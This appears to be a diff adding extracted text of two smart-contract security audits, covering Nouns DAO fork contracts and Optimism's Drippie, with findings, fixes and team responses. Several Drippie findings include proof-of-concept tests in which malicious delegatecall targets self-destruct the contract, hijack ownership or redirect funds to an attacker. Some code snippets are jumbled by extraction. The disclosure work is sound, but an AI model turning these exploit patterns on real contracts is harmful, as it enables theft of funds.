the implementation. You might consider utilizing a tool such as codespell to aid in the identification of misspelled words within the source code. Nouns: Fix PR: nounsDAO/nouns-monorepo#731. Spearbit: Fixed. +5.5.16 Contracts are not using the _disableInitializers function Severity: Informational Context: NounsDAOExecutorV2.sol#L46, NounsAuctionHouseFork.sol#L84, NounsTokenFork.sol#L127 Description: Several Nouns-Dao contracts utilize the Initializable module provided by OpenZeppelin. To ensure that an implementation contract is not left uninitialized, it is recommended in OpenZeppelin's documentation to include the _disableInitializers function in the constructor. The _disableInitializers function automatically locks the contracts upon deployment. According to the OpenZeppelin documentation: Do not leave an implementation contract uninitialized. An uninitialized implementation contract can be taken over by an attacker, which may impact the proxy. To prevent the implementation contract from being used, you should invoke the _disableInitializers function in the constructor to automatically lock it when it is deployed: Recommendation: It is recommended to add the _disableInitializers function in the constructor of the up- gradeable contracts. Nouns: Won't Fix. We're still using an older OZ version without this feature. Upgrading our OZ version is out of scope in this release. Spearbit: Acknowledged. 55 +5.5.17 Missing or incomplete Natspec documentation Severity: Informational Context: NounsDAOV3Proposals.sol, NounsDAOV3Admin.sol, NounsDAOV3Proposals.sol, NounsDAOLogicV3.sol NounsDAOV3Fork.sol#L203, NounsDAOExecutor.sol, NounsDAOV3Votes.sol#L295, NounsDAOExecutorV2.sol, NounsDAOV3Admin.sol, NounsTokenFork.sol, Description: There are several instances throughout the codebase where NatSpec is either missing or incomplete. 1. Missing Natspec (Some functions in this case are missing Natspec comment): • NounsDAOV3Fork.sol#L203 • NounsDAOV3Votes.sol#L295 • NounsDAOV3Admin.sol • NounsDAOV3Proposals.sol • NounsDAOExecutor.sol • NounsDAOExecutorV2.sol 2. Incomplete Natspec (Some functions are missing @param tag): • NounsTokenFork.sol • NounsDAOV3Admin.sol • NounsDAOV3Proposals.sol • NounsDAOLogicV3.sol Recommendation: Consider reviewing the codebase for missing or incomplete NatSpec comments and parame- ter tags. Add them where appropriate. Nouns: We made some fixes for things we found. Since not all cases were listed we were not able to fix everything. Here are a few: • PR 737. • PR 731. Spearbit: Acknowledged. +5.5.18 Function ordering does not follow the Solidity style guide Severity: Informational Context: ERC721CheckpointableUpgradeable.sol#L50, NounsDAOExecutorV2.sol#L46 Description: The recommended order of functions in Solidity, as outlined in the Solidity style guide, is as follows: constructor(), receive(), fallback(), external, public, internal and private. However, this ordering isn't enforced in the across the Nouns-Dao codebase. Recommendation: It is recommended to follow the recommended order of functions in Solidity, as outlined in the Solidity style guide. Nouns: We won't fix this one. Spearbit: Acknowledged. 56 +5.5.19 Use a more recent Solidity version Severity: Informational ERC721CheckpointableUpgradeable.sol#L46, NounsDAOExecutorV2.sol#L40, NounsDAOLog- Context: icV3.sol#L56, NounsDAOV3Votes.sol#L18 Description: The compiler version used 0.8.6 is quite old (current version is 0.8.20). This version was released almost two years ago and there have been five applicable bug fixes to this version since then. While it seems that those bugs don't apply to the Nouns-Dao codebase, it is advised to update the compiler to a newer version. Recommendation: It is recommended to upgrade the codebase to a more recent compiler version. Nouns: We upgraded the solidity version to 0.8.19 in the following PR 724. Spearbit: Fix looks good. The project now uses solidity version 0.8.19. +5.5.20 State modifications after external sToOwner prone to reentrancy attacks Severity: Informational interactions make NounsDAOForkEscrow's returnToken- Context: NounsDAOForkEscrow.sol#L110-L125 Description: External NFT call happens before numTokensInEscrow update in returnTokensToOwner(). This looks safe (NFT is fixed to be noun contract and transferFrom() is used instead of the safe version, and also numTokensInEscrow = 0 in closeEscrow() acts as a control for numTokensInEscrow -= tokenIds.length logic), but in general this type of execution flow structuring could allow for direct stealing via reentrancy. I.e. in a presence of callback (e.g. arbitrary NFT instead of noun contract or safeTransferFrom instead of trans- ferFrom) and without numTokensInEscrow = 0 conflicting with numTokensInEscrow -= tokenIds.length, as an abstract example, an attacker would add the last needed noun for forking, then call withdrawFromForkEscrow() and then, being in returnTokensToOwner(), call executeFork() from the callback hook, successfully performing the fork, while already withdrawn the NFT that belongs to DAO. • NounsDAOForkEscrow.sol#L110-L125) function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO { for (uint256 i = 0; i < tokenIds.length; i++) { if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner(); >> nounsToken.transferFrom(address(this), owner, tokenIds[i]); escrowedTokensByForkId[forkId][tokenIds[i]] = address(0); } numTokensInEscrow -= tokenIds.length; } • NounsDAOV3Fork.sol#L109-L130 57 function executeFork(NounsDAOStorageV3.StorageV3 storage ds) external returns (address forkTreasury, address forkToken) { if (isForkPeriodActive(ds)) revert ForkPeriodActive(); INounsDAOForkEscrow forkEscrow = ds.forkEscrow; >> uint256 tokensInEscrow = forkEscrow.numTokensInEscrow(); if (tokensInEscrow <= forkThreshold(ds)) revert ForkThresholdNotMet(); uint256 forkEndTimestamp = block.timestamp + ds.forkPeriod; (forkTreasury, forkToken) = ds.forkDAODeployer.deployForkDAO(forkEndTimestamp, forkEscrow); sendProRataTreasury(ds, forkTreasury, tokensInEscrow, adjustedTotalSupply(ds)); uint32 forkId = forkEscrow.closeEscrow(); ds.forkDAOTreasury = forkTreasury; ds.forkDAOToken = forkToken; ds.forkEndTimestamp = forkEndTimestamp; emit ExecuteFork(forkId, forkTreasury, forkToken, forkEndTimestamp, tokensInEscrow); } Direct stealing as a result of state manipulations is possible conditional on an ability to enter a callback. Given the absense of the latter at the moment, but critical impact of the former, considering this as best practice recommen- dation and setting the severity to be informational. Recommendation: Consider placing the external call after updating the state (do checks, effects, then interac- tions), i.e. performing 1 increment per time, for example: • NounsDAOForkEscrow.sol#L116-L125 function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO { for (uint256 i = 0; i < tokenIds.length; i++) { if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner(); - + + - } nounsToken.transferFrom(address(this), owner, tokenIds[i]); escrowedTokensByForkId[forkId][tokenIds[i]] = address(0); numTokensInEscrow--; nounsToken.transferFrom(address(this), owner, tokenIds[i]); } numTokensInEscrow -= tokenIds.length; It does add storage manipulations and increases gas cost, but it can be reasonable for this somewhat rarely called function that performs only few iterations in the majority of cases. Nouns: Won't Fix. Given the assumption of using NounsToken without external calls, the risk to Nouns DAO is zero. Spearbit: Acknowledged. 58 +5.5.21 No need to use an assembly block to get the chain ID Severity: Informational Context: ERC721CheckpointableUpgradeable.sol#L294-L300 Description: Currently the getChainId() uses an assembly block to get the current chain ID when constructing the domain separator. This is not needed since there is a global variable for this already. Recommendation: You could consider removing the internal getChainId() method and use the global variable block.chainid instead. Nouns: Fixed in this commit: 1fc830 Spearbit: Verified. +5.5.22 Naming convention for interfaces is not always always followed Severity: Informational Context: NounsTokenForkLike.sol#L5 Description: The NounsTokenForkLike interface does not follow the standard naming convention for Solidity interfaces, which begins with an I prefix. This inconsistency can make it harder for developers to understand the purpose and usage of the contract. Recommendation: It is recommended to prefix the NounsTokenForkLike interface with I: -interface NounsTokenForkLike { +interface INounsTokenForkLike { function getPriorVotes(address account, uint256 blockNumber) external view returns (uint96); function totalSupply() external view returns (uint256); . . . Nouns: Fixed in this commit ede514 Spearbit: Verified. The interface is now prefixed with I. 59 diff --git a/findings_newupdate/spearbit/OptimismDrippie-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/OptimismDrippie-Spearbit-Security-Review.txt new file mode 100644 index 0000000..f9f13ea --- /dev/null +++ b/findings_newupdate/spearbit/OptimismDrippie-Spearbit-Security-Review.txt @@ -0,0 +1,34 @@ +5.1.1 Permitting Multiple Drip Calls Per Block Severity: Medium Risk Context: Drippie.sol#L266 Description: state.config.interval is 0. We are currently unaware of use cases where this is desirable. The inline comments correctly note that reentrancy is possible and permitted when Reentrancy is one risk, flashbot bundles are a similar risk where the drip may be called multiple times by the same actor in a single block. A malicious actor may abuse this ability, especially if interval is misconfigured as 0 due to JavaScript type coercion. A reentrant call or flashbot bundle may be used to frontrun an owner attempting to archive a drip or attempting to withdraw assets. Recommendation: We recommend limiting drip calls to 1 per block. Document the transaction order dependence (frontrunning) risk for owners wishing to archive a drip. Reasonable drip intervals can be employed to prevent this attack. If it is important to permit multiple calls to the same drip in a single block, we recommend making the behavior opt-in rather than default if no state.config.interval specified. +function create(string memory _name, DripConfig memory _config, bool allowMultiplePerBlock) external onlyOwner { ,! -function create(string memory _name, DripConfig memory _config) external onlyOwner { // Make sure this drip doesn't already exist. We *must* guarantee that no other function // will ever set the status of a drip back to NONE after it's been created. This is why // archival is a separate status. require( drips[_name].status == DripStatus.NONE, "Drippie: drip with that name already exists" ); require( _config.interval > 0 || allowMultiplePerBlock, "Drippie, explict opt-in for 0 interval" ); // We initialize this way because Solidity won't let us copy arrays into storage yet. DripState storage state = drips[_name]; state.status = DripStatus.PAUSED; state.config.interval = _config.interval; state.config.dripcheck = _config.dripcheck; state.config.checkparams = _config.checkparams; // Solidity doesn't let us copy arrays into storage, so we push each array one by one. for (uint256 i = 0; i < _config.actions.length; i++) { state.config.actions.push(_config.actions[i]); } // Tell the world! emit DripCreated(_name, _name, _config); + + + + } Optimism: Fixed in PR #3280. Spearbit: Fixed. 4 5.2 Low Risk +5.2.1 Version Bump to Latest Severity: Low Risk Context: Drippie.sol#L2, CheckBalanceHigh.sol#L2, CheckBalanceLow.sol#L2, CheckGelatoLow.sol#L2, Check- True.sol#L2 Description: During the review, a new version of solidity was released with an important bugfix. Recommendation: Move from 0.8.15 to 0.8.16 Optimism: Fixed here PR #3567. Spearbit: • Drippie solidity version has been updated to 0.8.16 in PR#3280 • CheckBalanceHigh.sol, CheckBalanceLow.sol, CheckGelatoLow.sol, CheckTrue.sol solidity version have been updated to 0.8.16 in PR#3567 +5.2.2 DOS from External Calls in Drippie.executable / Drippie.drip Severity: Low Risk Context: Drippie.sol#L233-L236, Drippie.sol#L284 Description: In both the executable and drip (which also calls executable) functions, the Drippie contract interacts with some external contract via low-level calls. The external call could revert or fail with an Out of Gas exception causing the entire drip to fail. The severity is low beacuse in the case where a drip reverts due to a misconfigured or malicious dripcheck or target, the drip can still be archived and a new one can be created by the owner. Recommendation: The DOS vector is documented inline, consider elevating to @natspec and user docs. Worth noting is that drips expect the DripAction.target to revert on failure and not fail silently. In other words, all action targets MUST revert on failure, else unexpected behaviour between actions may occur. +5.2.3 Use call.value over transfer in withdrawETH Severity: Low Risk Context: AssetReceiver.sol#L89 Description: transfer is no longer recommended as a default due to unpredictable gas cost changes in future evm hard forks (see here for more background.) While useful to use transfer in some cases (such as sending to EOA or contract which does not process data in the fallback or receiver functions), this particular contract does not benefit: withdrawETH is already owner gated and is not at risk of reentrancy as owner already has permission to drain the contract’s ether in a single call should they choose. Recommendation: Use call.value over transfer in withdrawETH. Spearbit: Note that the implementation in PR#3280 has moved from transfer to a low-level call but has still some issues. The success value returned from the call is never used, returned as function returned variable or checked at all. Because of this reason, the current implementation of withdrawETH allow the function to "fail silently" when the internal low-level call revert and return success = false. In this case, the ETH has not been transferred to the recipient, but because the "main" transaction does not revert the WithdrewETH is still emitted, and the caller will think that the ETH has been correctly transferred. 5 Optimism: We agree and intend to fix this, though not immediately. This is OK as it’s an onlyOwner gated function which we expect to use very infrequently. Spearbit: Acknowledged. +5.2.4 Input Validation Checks for Drippie.create Severity: Low Risk Context: Drippie.sol#L126-L149 Description: Drippie.create does not validate input potentially leading to unintended results. The function should check: • _name is not an empty string to avoid creating drip that would be able to read on frontend UI. • _config.dripcheck should not be address(0) otherwise executable will always revert. • _config.actions.length should be at least one (_config.actions.length > 0) to prevent creating drips that do nothing when executed. • DripAction.target should not be address(0) to prevent burning ETH or interacting with the zero address during drip’s execution. Recommendation: Consider implementing the suggested checks to prevent misconfigured drips. DripAction.data and DripConfig.params are not type checked, however, there is no simple fix without sacrificing flexibility. We recommend surfacing a caution in user docs. +5.2.5 Ownership Initialization and Transfer Safety on Owned.setOwner Severity: Low Risk Context: Drippie.sol#L116 Description: Consider the following scenarios. • Scenario 1 Drippie allows the owner to be both initialized and set to address(0). If this scenario happens nobody will be able to manage the Drippie contract, thus preventing any of the following operations: • Creating a new drip • Updating a drip’s status (pausing, activating or archiving a drip) If set to the zero address, all the onlyOwner operations in AssetReceiver and Transactor will be uncallable. This scenario where the owner can be set to address(0) can occur when address(0) is passed to the construc- tor or setOwner. • Scenario 2 owner may be set to address(this). Given the static nature of DripAction.target and DripAction.data there is no benefit of setting owner to address(this), and all instances can be assumed to have been done so in error. Recommendation: Add a check for address(0) and address(this) in both the constructor and setOwner. For added safety, require the new owner to accept the ownership before ownership is transferred. 6 +5.2.6 Unchecked Return and Handling of Non-standard Tokens in AssetReceiver Severity: Low Risk Context: AssetReceiver.sol#L116 Description: The current AssetReceiver contract implement "direct" ETH and ERC20 token transfers, but does not cover edge cases like non-standard ERC20 tokens that do not: • revert on failed transfers • adhere to ERC20 interface (i.e. no return value) An ERC20 token that does not revert on failure would cause the WithdrewERC20 event to emit even though no transfer took place. An ERC20 token that does not have a return value will revert even if the call would have otherwise been successful. Solmate libraries already used inside the project offer a utility library called SafeTransferLib.sol which covers such edge cases. Be aware of the developer comments in the natspec: /// @dev Use with caution! Some functions in this library knowingly create dirty bits at the destination of the free memory pointer. /// @dev Note that none of the functions in this library check that a token has code at all! That responsibility is delegated to the caller. Recommendation: Consider integrating Solmate SafeTransferLib inside AssetReceiver to cover edge cases. +5.2.7 AssetReceiver Allows Burning ETH, ERC20 and ERC721 Tokens Severity: Low Risk Context: AssetReceiver.sol#L89, AssetReceiver.sol#L116, AssetReceiver.sol#L133 Description: AssetReceiver contains functions that allow the owner of the contract to withdraw ETH, ERC20 and ERC721 tokens. Those functions allow specifying the receiver address of ETH, ERC20 and ERC721 tokens but they do not check that the receiver address is not address(0). By not doing so, those functions allow to: • Burn ETH if sent to address(0). • Burn ERC20 tokens if sent to address(0) and the ERC20 _asset allow tokens to be burned via transfer (For example, Solmate’s ERC20 allow that, OpenZeppelin instead will revert if the recipient is address(0)). • Burn ERC721 tokens if sent to address(0) and the ERC721 _asset allow tokens to be burned via trans- ferFrom (For example, both Solmate and OpenZeppelin implementations prevent to send the _id to the address(0) but you don’t know if that is still true about custom ERC721 contract that does not use those libraries). Recommendation: Add a check on all those functions to revert if _to is address(0). 7 +5.2.8 AssetReceiver Not Implementing onERC721Received Callback Required by safeTransferFrom. Severity: Low Risk Context: AssetReceiver.sol Description: AssetReceiver contains the function withdrawERC721 that allow the owner to withdraw ERC721 tokens. As stated in the EIP-721, the safeTransferFrom (used by the sender to transfer ERC721 tokens to the AssetRe- ceiver) will revert if the target contract (AssetReceiver in this case) is not implementing onERC721Received and returning the expected value bytes4(keccak256("onERC721Received(address,address,uint256,bytes)")). Recommendation: Add the onERC721Received callback function in the AssetReceiver contract to be able to receive ERC721 tokens. +5.2.9 Both Transactor.CALL and Transactor.DELEGATECALL Do Not Emit Events Severity: Low Risk Context: Transactor.sol#L27-L34, Transactor.sol#L46-L53 Description: Transactor contains a "general purpose" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both of those functions are executing delegatecall and call without emitting any events. Because of the general- purpose nature of these function, it would be considered a good security measure to emit events to track the function’s usage. Those events could be then used to monitor and track usage by external monitoring services. Recommendation: Consider adding event emission to both delegatecal and call functions. +5.2.10 Both Transactor.CALL and Transactor.DELEGATECALL Do Not Check the Result of the Execution Severity: Low Risk Context: Transactor.sol#L27-L34, Transactor.sol#L46-L53 Description: The Transactor contract contains a "general purpose" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both functions return the delegatecall and call result back to the caller without checking whether execution was successful or not. By not implementing such check, the transaction could fail silently. Another side effect is that the ETH sent along with the execution (both functions are payable) would remain in the Drippie contract and not transferred to the _target. Test example showcasing the issue: contract Useless { // A contract that have no functions // No fallback functions // Will not accept ETH (only from selfdestruct/coinbase) } function test_transactorCALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them 8 (success, ) = drippie.CALL{value: 1 ether}(address(useless), "", 100000, 1 ether); assertEq(success, false); vm.prank(deployer); // Perform a `call` to a not existing target's function (success, ) = drippie.CALL{value: 1 ether}(address(useless), abi.encodeWithSignature("notExistingFn()"), 100000, 1 ether); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! } function test_transactorDELEGATECALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `delegatecall` to a contract that cannot receive them (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), "", 100000); assertEq(success, false); vm.prank(deployer); // Perform a `delegatecall` to a not existing target's function (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), abi.encodeWithSignature("notExistingFn()"), 100000); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! } Recommendation: Consider adding a check on both functions to cause the transaction to revert in case the execution of delegatecall or call returns success == false. +5.2.11 Transactor.DELEGATECALL Data Overwrite and selfdestruct Risks Severity: Low Risk Context: Transactor.sol#L46-L53 Description: The Transactor contract contains a "general purpose" DELEGATECALL function that allow the owner to execute a delegatecall toward a target address passing an arbitrary payload. Consider the following scenarios: • Scenario 1 A malicious target contract could selfdestruct the Transactor contract and as a consequence the contract that is inheriting from Transactor. Test example showcasing the issue: 9 contract SelfDestroyer { function destroy(address receiver) external { selfdestruct(payable(receiver)); } } function test_canOwnerSelftDestructDrippie() public { // Assert that Drippie exist assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); assertGt(getContractSize(address(drippie)), 0); // set it to active vm.prank(deployer); drippie.status(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); // fund the drippie with 1 ETH vm.deal(address(drippie), 1 ether); uint256 deployerBalanceBefore = deployer.balance; uint256 drippieBalanceBefore = address(drippie).balance; // deploy the destroyer SelfDestroyer selfDestroyer = new SelfDestroyer(); vm.prank(deployer); drippie.DELEGATECALL(address(selfDestroyer), abi.encodeWithSignature("destroy(address)", deployer), gasleft()); ,! uint256 deployerBalanceAfter = deployer.balance; uint256 drippieBalanceAfter = address(drippie).balance; // assert that the deployer has received the balance that was present in Drippie assertEq(deployerBalanceAfter, deployerBalanceBefore + drippieBalanceBefore); assertEq(drippieBalanceAfter, 0); // Weird things happens with forge // Because we are in the same block the code of the contract is still > 0 so // Cannot use assertEq(getContractSize(address(drippie)), 0); // Known forge issue // 1) Forge resets storage var to 0 after self-destruct (before tx ends) 2654 -> https://github.com/foundry-rs/foundry/issues/2654 // 2) selfdestruct has no effect in test 1543 -> https://github.com/foundry-rs/foundry/issues/1543 assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); ,! } • Scenario 2 The delegatecall allows the owner to intentionally, or accidentally, overwrite the content of the drips mapping. By being able to modify the drips mapping, a malicious user would be able to execute a series of actions like: Changing drip’s status: • Activating an archived drip • Deleting a drip by changing the status to NONE (this allows the owner to override entirely the drip by calling again create) • Switching an active/paused drip to paused/active 10 • etc.. Change drip’s interval: • Prevent a drip from being executed any more by setting interval to a very high value • Allow a drip to be executed more frequently by lowering the interval value • Enable reentrancy by setting interval to 0 Change drip’s actions: • Override an action to send drip’s contract balance to an arbitrary address • etc.. Test example showcasing the issue: contract ChangeDrip { address public owner; mapping(string => Drippie.DripState) public drips; function someInnocentFunction() external { drips["FUND_BRIDGE_WALLET"].config.actions[0] = Drippie.DripAction({ target: payable(address(1024)), data: new bytes(0), value: 1 ether }); } } 11 function test_canDELEGATECALLAllowReplaceAction() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Create an action with name "FUND_BRIDGE_WALLET" that have the function // To fund a wallet vm.startPrank(deployer); string memory fundBridgeWalletName = "FUND_BRIDGE_WALLET"; Drippie.DripAction[] memory actions = new Drippie.DripAction[](1); // The first action will send Bob 1 ether actions[0] = Drippie.DripAction({ target: payable(address(alice)), data: new bytes(0), value: 1 ether ,! }); Drippie.DripConfig memory config = createConfig(100, IDripCheck(address(checkTrue)), new bytes(0), actions); drippie.create(fundBridgeWalletName, config); drippie.status(fundBridgeWalletName, Drippie.DripStatus.ACTIVE); vm.stopPrank(); // Deploy the malicius contract vm.prank(attacker); ChangeDrip changeDripContract = new ChangeDrip(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(changeDripContract), abi.encodeWithSignature("someInnocentFunction()"), 1000000); ,! // Now the drip action should have changed, anyone can execute it and funds would be sent to // the attacker and not to the bridge wallet drippie.drip(fundBridgeWalletName); // Assert we have drained Drippie assertEq(attacker.balance, 1 ether); assertEq(address(drippie).balance, 9 ether); } • Scenario 3 Calling a malicious contract or accidentally calling a contract which does not account for Drippie’s storage layout can result in owner being overwritten. Test example showcasing the issue: contract GainOwnership { address public owner; function someInnocentFunction() external { owner = address(1024); } } 12 function test_canDELEGATECALLAllowOwnerLoseOwnership() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Deploy the malicius contract vm.prank(attacker); GainOwnership gainOwnershipContract = new GainOwnership(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(gainOwnershipContract), abi.encodeWithSignature("someInnocentFunction()"), 1000000); ,! // Assert that the attacker has gained onwership assertEq(drippie.owner(), attacker); // Steal all the funds vm.prank(attacker); drippie.withdrawETH(payable(attacker)); // Assert we have drained Drippie assertEq(attacker.balance, 10 ether); assertEq(address(drippie).balance, 0 ether); } Recommendation: • On all Scenarios Document and instruct users to pay attention to each contract that Transactor interacts with when DELEGATECALL is called to prevent situations like this. If Drippie does not need to allow the owner to execute general purpose delegatecall consider removing the Transactor dependency from the inheritance chain. Be particularly cautious calling out to upgradeable contracts/proxies. • Scenario 1 Deploying with create2 allows for recovery of any tokens managed by the Drippie contract in the event it is accidentally selfdestructed by redeploying to the same address. • Scenario 3 A postcondition can also assist in protecting accidental owner overwriting: function DELEGATECALL( address _target, bytes memory _data, uint256 _gas ) external payable onlyOwner returns (bool, bytes memory) { + address prevOwner = owner; // slither-disable-next-line controlled-delegatecall return _target.delegatecall{ gas: _gas }(_data); (bool success, bytes memory res) = _target.delegatecall{ gas: _gas }(_data); require(prevOwner == owner, "accidential onwer overwrite"); return (success, res); - + + + } 13 5.3 Gas Optimization +5.3.1 Use calldata over memory Severity: Gas Optimization Context: Drippie.sol#L126, Drippie.sol#L160, Drippie.sol#L213, Drippie.sol#L252 Description: Some gas savings if function arguments are passed as calldata instead of memory. Recommendation: Use calldata in these instances. Optimism: Addressed in PR#3280. Spearbit: Fixed. +5.3.2 Avoid String names in Events and Mapping Key Severity: Gas Optimization Context: Drippie.sol#L111 Description: Drip events emit an indexed nameref and the name as a string. These strings must be passed into every drip call adding to gas costs for larger strings. Recommendation: For off chain uses, i.e. user interface display, the names are useful. A more gas efficient approach would be to use uint256 or bytes32 for drip mapping keys. The string names may still be stored in DripState for off chain reading, but gas would be saved in not logging names each time a drip is called and not needing to incur the variable gas costs longer names introduce. +5.3.3 Avoid Extra sloads on Drippie.status Severity: Gas Optimization Context: Drippie.sol#L160 Description: Information for emitting event can be taken from calldata instead of reading from storage. Can skip repeat drips[_name].status reads from storage. Recommendation: Consider implementing the following fixes. function status(string memory _name, DripStatus _status) external onlyOwner { ...snip... // If we made it here then we can safely update the status. drips[_name].status = _status; emit DripStatusUpdated(_name, _name, _status); emit DripStatusUpdated(_name, _name, drips[_name].status); + - } and function status(string memory _name, DripStatus _status) external onlyOwner { ...snip... + DripStatus currentStatus = drips[_name].status; // Make sure the drip in question actually exists. Not strictly necessary but there doesn't // seem to be any clear reason why you would want to do this, and it may save some gas in // the case of a front-end bug. require( 14 currentStatus != DripStatus.NONE, drips[_name].status != DripStatus.NONE, "Drippie: drip with that name does not exist" ); // Once a drip has been archived, it cannot be un-archived. This is, after all, the entire // point of archiving a drip. require( currentStatus != DripStatus.ARCHIVED, drips[_name].status != DripStatus.ARCHIVED, "Drippie: drip with that name has been archived" ); // Although not strictly necessary, we make sure that the status here is actually changing. // This may save the client some gas if there's a front-end bug and the user accidentally // tries to "change" the status to the same value as before. require( currentStatus != _status, drips[_name].status != _status, "Drippie: cannot set drip status to same status as before" ); // If the user is trying to archive this drip, make sure the drip has been paused. We do // not allow users to archive active drips so that the effects of this action are more // abundantly clear. if (_status == DripStatus.ARCHIVED) { require( currentStatus == DripStatus.PAUSED, drips[_name].status == DripStatus.PAUSED, "Drippie: drip must be paused to be archived" ); } ...snip... + - + - + - + - } Optimism: Addressed in PR#3280. Spearbit: Fixed. +5.3.4 Use Custom Errors Instead of Strings Severity: Gas Optimization Context: Drippie.sol Description: To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met. Recommendation: Consider using custom errors instead of revert strings. Optimism: Chose not to implement. Spearbit: Acknowledged. 15 +5.3.5 Increment In The For Loop Post Condition In An Unchecked Block Severity: Gas Optimization Context: Drippie.sol#L143, Drippie.sol#L273 Description: This is only relevant if you are using the default solidity checked arithmetic. i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } } Recommendation: Consider doing the increment in the for loop post condition in an unchecked block. Optimism: Chose not to implement. Spearbit: Acknowledged. 5.4 Informational +5.4.1 DripState.count Location and Use Severity: Informational Context: Drippie.sol#L61, Drippie.sol#L300 Description: DripState.count is recorded and never used within the Drippie or IDripCheck contracts. DripState.count is also incremented after all external calls, inconsistent with Checks, Effects, Interactions con- vention. Recommendation: Consider implementing the following recommendations. Recommendation 1: increment DripState.count before external calls. Recommendation 2: consider removing DripState.count entirely if it is not used on chain. Recommendation 3: if DripState.count is not removed, consider whether the information is useful in any future DripChecks. Optimism: Recommendation 1 implemented in PR#3280. Spearbit: Recommendation 1 implemented. 16 +5.4.2 Type Checking Foregone on DripCheck Severity: Informational Context: IDripCheck.sol#L4 Description: Passing params as bytes makes for a flexible DripCheck, however, type checking is lost. Recommendation: A helper may be added to DripChecks for users to confirm properly constructed params bytes array prior to creating a drip. contract CheckBalanceLow is IDripCheck { event _EventToExposeStructInABI__Params(Params params); struct Params { address target; uint256 threshold; } function check(bytes memory _params) external view returns (bool) { Params memory params = abi.decode(_params, (Params)); // Check target ETH balance is below threshold. return params.target.balance < params.threshold; } function encodeCheck(address target, uint256 threshold) external view returns (bytes memory) { } Params memory toEncode = Params(target, threshold); return abi.encode(toEncode); + + + + + + + + } +5.4.3 Confirm Blind ERC721 Transfers are Intended Severity: Informational Context: AssetReceiver.sol#L133 Description: AssetReceiver uses transferFrom instead of safeTransferFrom. The callback on safeTransferFrom often poses a reentrancy risk but in this case the function is restricted to onlyOwner. Recommendation: Consider added safety of safeTransferFrom when sending to contracts. +5.4.4 Code Contains Empty Blocks Severity: Informational Context: Transactor.sol#L14, AssetReceiver.sol#L63 Description: It’s best practice that when there is an empty block, to add a comment in the block explaining why it’s empty. While not technically errors, they can cause confusion when reading code. Recommendation: Consider adding /* Comment on why */ to the empty blocks. Optimism: Chose not to implement. Spearbit: Acknowledged. 17 +5.4.5 Code Structure Deviates From Best-Practice Severity: Informational Context: Drippie.sol#L100-L111 CheckGelatoLow.sol#L15-L20, CheckBalanceLow.sol#L11-L15, CheckBalanceHigh.sol#L11-L15, Description: The best-practice layout for a contract should follow this order: • State variables. • Events. • Modifiers. • Constructor. • Functions. Function ordering helps readers identify which functions they can call and find constructor and fallback functions easier. Functions should be grouped according to their visibility and ordered as: constructor, receive function (if ex- ists), fallback function (if exists), external, public, internal, private. Some constructs deviate from this recommended best-practice: structs and mappings after events. Recommendation: Consider adopting recommended best-practice for code structure and layout. Optimism: Fixed in PR#3280. Spearbit: Fixed. +5.4.6 Missing or Incomplete NatSpec Severity: Informational Context: AssetReceiver.sol#L19, CheckTrue.sol, CheckGelatoLow.sol, CheckBalanceLow.sol, CheckBalance- High.sol Description: Some functions are missing @notice/@dev NatSpec comments for the function, @param for all/some of their parameters and @return for return values. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability. Recommendation: Consider adding in full NatSpec comments for all functions to have complete code documen- tation for future use. Optimism: Fixed in PR#3280. Spearbit: Fixed. +5.4.7 Checking Boolean Against Boolean Severity: Informational Context: Drippie.sol#L256-L259 Description: executable returns a boolean in which case the comparison to true is unnecessary. executable also reverts if any precondition check fails in which case false will never be returned. Recommendation: If important to check, change require to assert to facilitate invariant checking (using tools like Mythril): 18 function drip(string memory _name) external { DripState storage state = drips[_name]; // Make sure the drip can be executed. require( assert( executable(_name) == true, executable(_name) "Drippie: drip cannot be executed at this time, try again later" ); ...snip... - + - + } Or, remove the extra check entirely: function drip(string memory _name) external { DripState storage state = drips[_name]; // Make sure the drip can be executed. require( executable(_name) == true, "Drippie: drip cannot be executed at this time, try again later" ); executable(_name) ...snip... - - - - + } Optimism: The recommendation has been implemented in the PR#3280 Spearbit: Fixed. +5.4.8 Drippie.executable Never Returns false Only true or Reverts Severity: Informational Context: Drippie.sol#L206-L240 Description: executable(string memory _name) public view returns (bool). The executable implemented in the Drippie contract has the following signature From the signature and the natspec documentation @return True if the drip is executable, false 